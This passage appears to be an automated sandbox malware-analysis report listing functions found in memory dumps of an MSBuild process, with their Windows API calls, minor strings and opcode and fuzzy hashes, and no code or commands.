Instruction Fuzzy Hash: 84711475D05348DFDB05DFA5D894ADEBFB2FF89300F24806AE815AB265DB305806CB51

Function 00EBE4F0 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0bd76069d74b0edfb02e1e4d8296837f1cf53d092cc69b06d1ef37b7724068
Instruction ID: e16a02449185073c8659f5b60a794cb3e7aa4573f3d8ee65891ac50a46b828a1
Opcode Fuzzy Hash: 0e0bd76069d74b0edfb02e1e4d8296837f1cf53d092cc69b06d1ef37b7724068
Instruction Fuzzy Hash: A351AFB4D05208CBDB14CFAAD5806EEFBF2BF89304F249529D815BB354DB35A942CB54

Function 059D0D90 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37d69b7fe3f881b7b78f50fdf57f17152d7f13bb4c261e20bb1ed0cc17f8b22c
Instruction ID: 8f31a157062bd768bccbbab9ca3902dfffaa5c16112b9f9b9415c8a4164299ae
Opcode Fuzzy Hash: 37d69b7fe3f881b7b78f50fdf57f17152d7f13bb4c261e20bb1ed0cc17f8b22c
Instruction Fuzzy Hash: 3541BBB1E016299BEB69CF66CD417DAF6F7AFC8300F04C0FA941CA7264DA741A858F10

Function 059DBE78 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dfb5cd0977a4eeeeee10d73e4e1011d331db2973f741ac429c86e2d94121ae9
Instruction ID: d2a391efc7c62c9fb3f9d5f17224d5247c223e30c9475964ce44aa5fbabca8fd
Opcode Fuzzy Hash: 3dfb5cd0977a4eeeeee10d73e4e1011d331db2973f741ac429c86e2d94121ae9
Instruction Fuzzy Hash: 6E2174B2E016589BEB18CFABD8446DDFAF3AFC8300F14C53AD819AA264DB744546CA54

Function 00EBE4E0 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 706113e5aab9269fc4ed57bd2588526cc14e4bd6b4f3487b221d4744a68e0b17
Instruction ID: 7d24bcd213196fccf3d63296dbc6e2910a40794fe8b260a600a38711a9758430
Opcode Fuzzy Hash: 706113e5aab9269fc4ed57bd2588526cc14e4bd6b4f3487b221d4744a68e0b17
Instruction Fuzzy Hash: 522195B5E01649DBDB18CFAAD5806DEFBF2BF89300F14D02AE419AB254EB3459468B50

Function 00EB5690 Relevance: 4.3, APIs: 1, Instructions: 2793
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PerfStartProviderEx.KERNELBASE ref: 00EB6177

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: PerfProviderStart
String ID:
API String ID: 1077581468-0
Opcode ID: 4e6116de2a4ba140907a6c2c3c089e231a3375fdbc7b20183ed1fbd593a0bfb5
Instruction ID: 0d0da0687fbe8fa11d382ef249198fa8b7b7748aec73f48284077214ba9c4ec7
Opcode Fuzzy Hash: 4e6116de2a4ba140907a6c2c3c089e231a3375fdbc7b20183ed1fbd593a0bfb5
Instruction Fuzzy Hash: 6D639B78A0621ACFCB65EF34D990E9AB7B2FB49301F6045D9D8096B358D7329E81DF40

Function 00EB56B0 Relevance: 4.3, APIs: 1, Instructions: 2778
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PerfStartProviderEx.KERNELBASE ref: 00EB6177

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: PerfProviderStart
String ID:
API String ID: 1077581468-0
Opcode ID: edf2bd34081b74eaf3454afd7fd400010ada969fc37adc1173e85fe85333da85
Instruction ID: 02f853ea8da1789c0f8aaac7c3385f8883d6bcf630362018deef8a5692ac5481
Opcode Fuzzy Hash: edf2bd34081b74eaf3454afd7fd400010ada969fc37adc1173e85fe85333da85
Instruction Fuzzy Hash: 15639B78A0621ACFCB65EF34D990E9AB7B2FB49301F6045D9D8096B358D7329E81DF40

Function 00EBCFB0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBD088

Strings

buz, xrefs: 00EBCFDA

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: DuplicateHandle
String ID: buz
API String ID: 3793708945-3044919918
Opcode ID: 1fe1c206d6f46c095ec4669dbb3763cc77509084766a12823c99395b0d4c2bd0
Instruction ID: 3ab217ed92cc9803eed7b53f2994d47cb56d7be54c2e9da810049532b6ed3764
Opcode Fuzzy Hash: 1fe1c206d6f46c095ec4669dbb3763cc77509084766a12823c99395b0d4c2bd0
Instruction Fuzzy Hash: AC419BB9D042589FCF00DFA9D884AEEFBF1BB1A310F14A02AE814B7250D3759955DF64

Function 00EBCFB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBD088

Strings

buz, xrefs: 00EBCFDA

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: DuplicateHandle
String ID: buz
API String ID: 3793708945-3044919918
Opcode ID: 84cbfcd88d3368ef2b1b8273dc06245ad30d5231a10fd192a583012674db1b20
Instruction ID: abcd80a8ad45be9e5df7ed40890bad286ca7afdca81401d37a4359612edf16e3
Opcode Fuzzy Hash: 84cbfcd88d3368ef2b1b8273dc06245ad30d5231a10fd192a583012674db1b20
Instruction Fuzzy Hash: 91419BB9D042589FCF00CFA9D880AEEFBF1BB09310F14A02AE814B7250D375A945DF64

Function 059D2378 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 059D2437

Strings

buz, xrefs: 059D239D

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID: CreateHeap
String ID: buz
API String ID: 10892065-3044919918
Opcode ID: 0cbd290168ff29c893e45b9ea86e05c438eabe8f59c1b0afbb6d4ace5b0263c0
Instruction ID: 6ab2405454888a301da3a40c71feac559e6350d10fc14fe604c3a51bec0df289
Opcode Fuzzy Hash: 0cbd290168ff29c893e45b9ea86e05c438eabe8f59c1b0afbb6d4ace5b0263c0
Instruction Fuzzy Hash: 134177B8D012599FCF00CFA9D984A9EFBF1BB49310F24A02AE819B7310D335A945CF64

Function 059D2380 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 059D2437

Strings

buz, xrefs: 059D239D

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID: CreateHeap
String ID: buz
API String ID: 10892065-3044919918
Opcode ID: db3bb07c46948f68df0ccaca921cab19940f3fe5ab25339d7cf37772e9360f96
Instruction ID: 4de63186feade1776668f38d02d92072f368d2fc12e83a13d79ba8d59b7e62a5
Opcode Fuzzy Hash: db3bb07c46948f68df0ccaca921cab19940f3fe5ab25339d7cf37772e9360f96
Instruction Fuzzy Hash: C34166B8D052589FCF00CFA9D984A9EFBB5BB49310F24A01AE819B7310D335A945CF68

Function 05993310 Relevance: 1.8, Strings: 1, Instructions: 550
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7, xrefs: 059933FC

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: 888c67f3fbcab59614a518d7a0e4f5aedd9ef85dbcb79ab8223f583d8b569272
Instruction ID: e672fc9d9fbc0cf8b7968d132bc49a33a4c712a93b78d100ca0e3f9e8ca38e0d
Opcode Fuzzy Hash: 888c67f3fbcab59614a518d7a0e4f5aedd9ef85dbcb79ab8223f583d8b569272
Instruction Fuzzy Hash: 9C228E756003059FDF18DF69C884BAEBBB6FF88310F648869E5069B394DB35E841CB90

Function 059DC7C8 Relevance: 1.7, APIs: 1, Instructions: 159
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 059DC853

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ef7344b16b4df72223f7d6db940bd2edaf8816627e5bc8879d79c4ddefc85a1
Instruction ID: 3ad1bf9bfe2d0f8f074124e14de67b93de50771a8d0548296c8d6f54738246b3
Opcode Fuzzy Hash: 6ef7344b16b4df72223f7d6db940bd2edaf8816627e5bc8879d79c4ddefc85a1
Instruction Fuzzy Hash: E3716B78E052089FCB54DFA9D584A9EBBF2BF88300F20916AE815AB354D731AD41CF54

Function 059DA110 Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059DA1EB

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e49128aa0da47801f9d7f54b85b5e3a7e611c5504911ec36449b9f9c1f39f157
Instruction ID: 524ae00b7aa39506eedf911ff9b6f31e6ebf9b273376e7020b393484932071f1
Opcode Fuzzy Hash: e49128aa0da47801f9d7f54b85b5e3a7e611c5504911ec36449b9f9c1f39f157
Instruction Fuzzy Hash: 7841C074E04208DBDB18CFAAD584ADEFBF6BF89310F14D129E408A7355DB349846CBA4

Function 00EBD108 Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00EBD1B1

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21afcd3b3959de051effbab0888c4a63c6fa2aa3e839ec7b59228e3040f699c9
Instruction ID: 7f2ba7929aad4a2ff08df7ca562df86b6e8b7933e1f77e85dd3a9a8bf9298766
Opcode Fuzzy Hash: 21afcd3b3959de051effbab0888c4a63c6fa2aa3e839ec7b59228e3040f699c9
Instruction Fuzzy Hash: 7C418074E05208DFDB18DFA9D984ADEBBB2AF89300F209129E415BB364EB359845CB54

Function 00EBD0F9 Relevance: 1.6, APIs: 1, Instructions: 104libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00EBD1B1

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 48295cf54726b4e2255d313348a45d4e1d80c5f2f5cd0cd19d6e374f6980301d
Instruction ID: 131b041f6478bd2785bc058b50720ee3f9e63f70a820c47f2aadacba4e0ffda0
Opcode Fuzzy Hash: 48295cf54726b4e2255d313348a45d4e1d80c5f2f5cd0cd19d6e374f6980301d
Instruction Fuzzy Hash: 0841C274E05208DFDB14DFA9D984ADEBBB2BF89300F10912AE414BB364EB359842CB54

Function 059DC7B8 Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 059DC853

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f041f06b4946a2dfca73f1e64da092b37dc12d81d5de05e1e71f5ba6b897d6f
Instruction ID: df31a5a099ee7fe6b29e42bcc369f901feea4565e24d4ce4a97615d36caf4a84
Opcode Fuzzy Hash: 0f041f06b4946a2dfca73f1e64da092b37dc12d81d5de05e1e71f5ba6b897d6f
Instruction Fuzzy Hash: 4441AE75E052089FDB14CFAAD484ADEFBF2BF88310F24816AE814A7365DB359941CF60

Function 05992280 Relevance: 1.6, Strings: 1, Instructions: 324COMMON

Download Yara Rule

Strings

&, xrefs: 05992305

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: a04a6dd459e9ba4cc1c2a667954f225e1daf8fdd04b69374c6070958bd91f42a
Instruction ID: 68fdf283371ad4af532af8a0bfebab8548d70d9e356736c4b16a9412abe60146
Opcode Fuzzy Hash: a04a6dd459e9ba4cc1c2a667954f225e1daf8fdd04b69374c6070958bd91f42a
Instruction Fuzzy Hash: 09B16938714202AFCF1DAF69A59553A7BE7BFC42013088969E8079B785DF34ED01CBA1

Function 00EBB8B0 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00EBB8E4

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8287b8df531b0e7fbe9636e93f5059fd074ad904128cc11edd3a0a104adcc379
Instruction ID: cebb6951798107ea3082f4fc37eb9dd5d762c9c6f5c2b133a4e50f15e223f149
Opcode Fuzzy Hash: 8287b8df531b0e7fbe9636e93f5059fd074ad904128cc11edd3a0a104adcc379
Instruction Fuzzy Hash: C911CEB4D05219EFDB04DFA9D4496EEBBF4AB48300F1094AA9818B3350EB740B84DF90

Function 00EBB8A0 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 00EBB8E4

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dc2e0b1b9afb21e08204e8beba75191f9ac2424340a9b1a80bd98d65a32e606c
Instruction ID: ce14f91164e7a291dc7eb93101cbbab840e6ea1b7a9db83ecd1574efa10f1bd2
Opcode Fuzzy Hash: dc2e0b1b9afb21e08204e8beba75191f9ac2424340a9b1a80bd98d65a32e606c
Instruction Fuzzy Hash: 290188B0C093889FCB01CFA9C9042EEBFF1AF46300F1486AAC854A32A1D7780A46DB10

Function 0592D548 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

U, xrefs: 0592D63D

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: ed59a0645bb757e3eef130c77e7fee8be3e2d2f5a2638983b261a7c59fce7147
Instruction ID: 38cd7696020536aed562568256675e838d77ff8db26b088d759edfd4149fd9fb
Opcode Fuzzy Hash: ed59a0645bb757e3eef130c77e7fee8be3e2d2f5a2638983b261a7c59fce7147
Instruction Fuzzy Hash: 6B71A130B08314CBD724CB28D4597797BA2FB81311F04896AF817ABB89CB3CDD4A9752

Function 0599A688 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

@, xrefs: 0599A7F0

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: cd6ff8f2c1955268f13ff873a6f8e2a16a3dbf62fb4d1208f921c7bac5b4345a
Instruction ID: d5434099e103eb5c05980a44479dddee112c16bffff34d2e513ca89aad320fd1
Opcode Fuzzy Hash: cd6ff8f2c1955268f13ff873a6f8e2a16a3dbf62fb4d1208f921c7bac5b4345a
Instruction Fuzzy Hash: 36517E75E002159FCF09CF68C885AEEBBF6FF88210F148466E805AB251E730DD40CBA0

Function 0599EADA Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

@, xrefs: 0599EB22

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: e5aecf3ed948f17a7cb16d17e966b7aef05d82eea1491c2893c0e08ccf365aba
Instruction ID: 3bf6f920492b90fba4d0e20451cfc42b5da663e6a5264fa597a02c7d235831cd
Opcode Fuzzy Hash: e5aecf3ed948f17a7cb16d17e966b7aef05d82eea1491c2893c0e08ccf365aba
Instruction Fuzzy Hash: 1D517F75A002099FDB15CF69C584EAEBFFABF88310F198465E905AB352D730ED45CBA0

Function 05993301 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

7, xrefs: 059933FC

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID: 7
API String ID: 0-1790921346
Opcode ID: 29bb1f61764c85d637b141cf1bcbd6d83d68c7d9afb2fca3a7c6d8f04c53c434
Instruction ID: 3699d4739ed35be632b7993787aba3ad935bb4cad25dbcb357ea2caf6bec4e30
Opcode Fuzzy Hash: 29bb1f61764c85d637b141cf1bcbd6d83d68c7d9afb2fca3a7c6d8f04c53c434
Instruction Fuzzy Hash: F0416A74700311DFDB29DF29C884A2AB7B6FF89320B65C969D8458B366DB31EC46CB50

Function 05991918 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

", xrefs: 05991D71

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: cf1e79f94a7831f5f40ab4530a8bab217d9bc7e4dc5bfad5f1c7518fdf430eb3
Instruction ID: a3466dcc1e1ed25f067c50b6a57286389ec86b39a6b2efcc7ae6220ea91889ee
Opcode Fuzzy Hash: cf1e79f94a7831f5f40ab4530a8bab217d9bc7e4dc5bfad5f1c7518fdf430eb3
Instruction Fuzzy Hash: 06413935725612CFCB4C9B68D15983D3BE6BB8A2413050999E807DB7A1CF38EE01DB56

Function 0592D539 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

U, xrefs: 0592D63D

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 1427dfed2c2a77b8e4867fbb4d8c388518ff659ef9c038e68a61109e3ab7a691
Instruction ID: 1ab9e7367847be84cf534f656a69ee4b24bed125c9084d53fdc7d34ea6d6f63e
Opcode Fuzzy Hash: 1427dfed2c2a77b8e4867fbb4d8c388518ff659ef9c038e68a61109e3ab7a691
Instruction Fuzzy Hash: 4B319A34600315DFC754CF24D48DA6EBBF2FF84321B18C669E82A9B251CB34E949DB90

Function 0599A678 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

@, xrefs: 0599A6BA

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f9192126e6bb3cf540ecb791e6a2466f84366f1cec44e835cb0f2bbac1e3818a
Instruction ID: e94c5a9ebe8555109979e3c10a1cd392c303ead48fac3fd4f4cccca130104966
Opcode Fuzzy Hash: f9192126e6bb3cf540ecb791e6a2466f84366f1cec44e835cb0f2bbac1e3818a
Instruction Fuzzy Hash: 70218376A002199FDF15CF69C885EEEBBBAFF88210F098425E914D7251D730D941CB90

Function 0599BF38 Relevance: .6, Instructions: 593COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97958e1173a1dc4cec267e0cfc93efe82d437462385f32f04dd7e7e66ba1978
Instruction ID: ac792bd2f7e3a053ad936a1a7b10214a346adbc567746274d2ef83873977c85b
Opcode Fuzzy Hash: c97958e1173a1dc4cec267e0cfc93efe82d437462385f32f04dd7e7e66ba1978
Instruction Fuzzy Hash: 64423C74A042459FCB18DF68C984EAEBBF2FF89310F558599E845AB361D730ED41CBA0

Function 059248B8 Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67cc19530ea80bc89586bbc08045261837009c7c76996e2f1af7fa1ba1a7ae87
Instruction ID: 7eacd78ff66bb7c19a4251fb67ada2a1e9c98549e3075a65b00f2dca887972cc
Opcode Fuzzy Hash: 67cc19530ea80bc89586bbc08045261837009c7c76996e2f1af7fa1ba1a7ae87
Instruction Fuzzy Hash: 052248347006118FDB14DF39C488A6ABBF6FF89700B1584A9E90ACB366DB31EC45CB61

Function 0599AA70 Relevance: .5, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6075b7778f52b780513b183d792d16dde7d5539700334361ca0685e725e3a66a
Instruction ID: 9bd19e009c8d2b9d03837b31b66c8febe45bfd5fce2c5589558e7f3bbbfa0657
Opcode Fuzzy Hash: 6075b7778f52b780513b183d792d16dde7d5539700334361ca0685e725e3a66a
Instruction Fuzzy Hash: 65122870A10205CFDB59DF68C484A6ABBF7FF88301B548469E81ADB395DB75EC41CB90

Function 05929398 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc30721e8ba3254e66bb0f80c521b82da4b78c54a4db8e2ebe64e03e3873c1a2
Instruction ID: 6db1a7fd1258bfad91aadff8f962f0ac78782630b0008d22128ac1d51ab2a846
Opcode Fuzzy Hash: bc30721e8ba3254e66bb0f80c521b82da4b78c54a4db8e2ebe64e03e3873c1a2
Instruction Fuzzy Hash: CDE15C74B047268BDB11EF68D990A6E77FAFF84700F548529D806DB388EB34DC418BA1

Function 05996468 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ed10f54e0d2150363b71449fac1250fad178caebf0b4f84946f72750cdaeac
Instruction ID: bafce203acf85ae3779de12de8055f6386c5e5178da83e1d049c97182be35a43
Opcode Fuzzy Hash: 68ed10f54e0d2150363b71449fac1250fad178caebf0b4f84946f72750cdaeac
Instruction Fuzzy Hash: D9E13B34B002059FDB18EF68D498A6DBBB6FF88310F548469E906DB395DB35DD42CBA0

Function 05928CC8 Relevance: .4, Instructions: 377COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3764dce53ee0655f74183495e9000e245bc50035f7f5c5257e7c37a57feba3a4
Instruction ID: b8968f08d5c896c9116e5c45bf4ce73d168fbc6ee2c5425d310016bff6ce70eb
Opcode Fuzzy Hash: 3764dce53ee0655f74183495e9000e245bc50035f7f5c5257e7c37a57feba3a4
Instruction Fuzzy Hash: 79D19131B093269FDB219B68884077ABBF7BF88A10F55495AE806DB359DB30DC41CBD1

Function 0599CECF Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c6d98fd61c0ba6eb4117ddfa2ed26943c4762d7b57d8da7856cd9db8a5ce9eb
Instruction ID: bb1570d149efdcad6890b3e2e1e77cce48f09b411250329d4481f8fa8cb0b427
Opcode Fuzzy Hash: 3c6d98fd61c0ba6eb4117ddfa2ed26943c4762d7b57d8da7856cd9db8a5ce9eb
Instruction Fuzzy Hash: F9E13A75B002158FDB18DF68C984AADBBF6FF88310B5585A9E905EB361DB30EC41CB90

Function 0592C6F8 Relevance: .3, Instructions: 325COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
